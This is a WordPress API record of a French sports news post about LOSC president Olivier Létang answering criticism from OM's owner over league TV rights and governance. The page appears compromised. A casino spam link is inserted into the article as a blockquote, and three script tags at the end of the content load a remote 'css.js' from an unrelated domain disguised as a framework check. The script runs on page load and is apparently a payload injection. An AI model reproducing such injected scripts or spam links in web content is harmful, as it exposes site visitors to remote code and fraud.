{"id":4011,"date":"2025-11-20T03:57:08","date_gmt":"2025-11-20T03:57:08","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4011"},"modified":"2026-02-02T22:10:14","modified_gmt":"2026-02-02T22:10:14","slug":"om-olivier-letang-repond-sechement-a-mccourt-les-clubs-ont-tous-valide-les-decisions","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-olivier-letang-repond-sechement-a-mccourt-les-clubs-ont-tous-valide-les-decisions\/","title":{"rendered":"OM &#8211; Olivier L\u00e9tang r\u00e9pond s\u00e8chement \u00e0 McCourt : \u00ab Les clubs ont tous valid\u00e9 les d\u00e9cisions \u00bb"},"content":{"rendered":"<h1>OM &#8211; Olivier L\u00e9tang r\u00e9pond s\u00e8chement \u00e0 McCourt : \u00ab Les clubs ont tous valid\u00e9 les d\u00e9cisions \u00bb<\/h1>\n<p><strong>Olivier L\u00e9tang<\/strong> a pris la parole en conf\u00e9rence de presse pour exposer sa vision du football fran\u00e7ais et r\u00e9pondre aux critiques qui visent la Ligue de Football Professionnel (LFP). Le pr\u00e9sident du <strong>LOSC<\/strong> a appel\u00e9 \u00e0 la solidarit\u00e9 entre clubs, tout en affirmant n\u2019avoir <em>\u00ab aucun agenda personnel \u00bb<\/em> et en rappelant que les grandes d\u00e9cisions sur les droits t\u00e9l\u00e9 ont \u00e9t\u00e9 valid\u00e9es collectivement.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-royat-fr.com\/contato\/\" target=\"_blank\" rel=\"dofollow\">Support client de Casino Vert \u2764\ufe0f : un service disponible 24h\/24<\/a><\/strong> &#8211; Vous \u00eates-vous d\u00e9j\u00e0 demand\u00e9 si le casino royat Service client \u00e9tait r\u00e9ellement pr\u00e9sent lorsque vous en aviez besoin\u202f? Que se passe-t-il si un bug survient en<\/p><\/blockquote>\n<h2>Un appel \u00e0 l\u2019unit\u00e9<\/h2>\n<p><em>\u00ab Se critiquer publiquement ne fait pas avancer le d\u00e9bat \u00bb<\/em>, a lanc\u00e9 L\u00e9tang, regrettant les attaques entre dirigeants. Il rappelle que <em>\u00ab toutes les grandes d\u00e9cisions ont \u00e9t\u00e9 prises par les clubs \u00bb<\/em> et assume avoir \u00e9t\u00e9 oppos\u00e9 \u00e0 la sortie du contrat avec Amazon : <em>\u00ab \u00c0 quel moment vous acceptez de l\u00e2cher 350 millions d\u2019euros ? \u00bb<\/em><\/p>\n<h2>Le poids du LOSC en Europe<\/h2>\n<p>Le patron lillois a soulign\u00e9 les progr\u00e8s de son club, pass\u00e9 de la 109e place au classement UEFA en 2020 \u00e0 la 26e en 2025, <em>\u00ab deuxi\u00e8me club fran\u00e7ais \u00bb<\/em>. Une r\u00e9ussite qu\u2019il veut partager : <em>\u00ab En tant que grand club, on doit participer \u00e0 l\u2019\u0153uvre collective pour tirer le football professionnel fran\u00e7ais vers le haut. \u00bb<\/em><\/p>\n<h2>Des finances \u00e0 assainir<\/h2>\n<p>L\u00e9tang insiste sur la n\u00e9cessit\u00e9 d\u2019une gestion rigoureuse des revenus et des charges : <em>\u00ab Ce qui ruisselle vers les clubs, ce sont les revenus moins les charges. Il faut qu\u2019on ait une gestion saine de l\u2019argent de la Ligue. \u00bb<\/em> Il pr\u00e9vient que de nombreux clubs, en Ligue 1 comme en Ligue 2, sont fragilis\u00e9s par la baisse des recettes.<\/p>\n<h2>Gouvernance et piratage dans le viseur<\/h2>\n<p>Le dirigeant souhaite une \u00e9volution de la gouvernance sans en faire <em>\u00ab une affaire de personne \u00bb<\/em>. Il pointe aussi le fl\u00e9au du piratage : <em>\u00ab C\u2019est une catastrophe et un cauchemar pour le football, le sport et m\u00eame le cin\u00e9ma. Nous avons besoin du l\u00e9gislateur. \u00bb<\/em><\/p>\n<h2>Un engagement sans calcul<\/h2>\n<p>L\u00e9tang assure qu\u2019il ne cherche <em>\u00ab aucun mandat \u00bb<\/em> et que sa priorit\u00e9 reste le LOSC : <em>\u00ab Si je participe aux instances, ce n\u2019est pas pour faire de la politique, mais pour mettre en place une vision, comme nous l\u2019avons fait ici. \u00bb<\/em><\/p>\n<h2>Interroger les diffuseurs<\/h2>\n<p>Enfin, il s\u2019interroge sur le refus de <strong>Canal+<\/strong> de revenir dans le football fran\u00e7ais malgr\u00e9 de bons r\u00e9sultats europ\u00e9ens : <em>\u00ab Pourquoi la France, seul grand championnat sans diffuseur, n\u2019attire-t-elle plus ? \u00bb<\/em> Une question qui r\u00e9sume son appel \u00e0 une r\u00e9flexion collective, loin des querelles publiques.<\/p>\n<p>Au Phoc\u00e9en, on ne peut que relever le d\u00e9calage entre les appels \u00e0 la solidarit\u00e9 de <strong>Olivier L\u00e9tang<\/strong> et la r\u00e9alit\u00e9 v\u00e9cue par les clubs comme l\u2019<strong>OM<\/strong>. Rappeler que <em>\u00ab toutes les d\u00e9cisions ont \u00e9t\u00e9 prises par les clubs \u00bb<\/em> ne suffit pas \u00e0 effacer les choix qui ont conduit le football fran\u00e7ais dans l\u2019impasse actuelle, ni \u00e0 masquer l\u2019urgence d\u2019une nouvelle gouvernance. L\u00e9tang d\u00e9fend son bilan et celui de la LFP, mais les supporters marseillais n\u2019oublient pas que ces d\u00e9cisions collectives, assum\u00e9es ou non, p\u00e8sent aujourd\u2019hui sur l\u2019OM et sur tout le championnat. Solidarit\u00e9, oui, mais pas au prix du silence face aux erreurs pass\u00e9es.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; Olivier L\u00e9tang r\u00e9pond s\u00e8chement \u00e0 McCourt : \u00ab Les clubs ont tous valid\u00e9 les d\u00e9cisions \u00bb Olivier L\u00e9tang a pris la parole en conf\u00e9rence de presse pour exposer&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4011","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4011"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4011\/revisions"}],"predecessor-version":[{"id":14859,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4011\/revisions\/14859"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4011"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4011"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}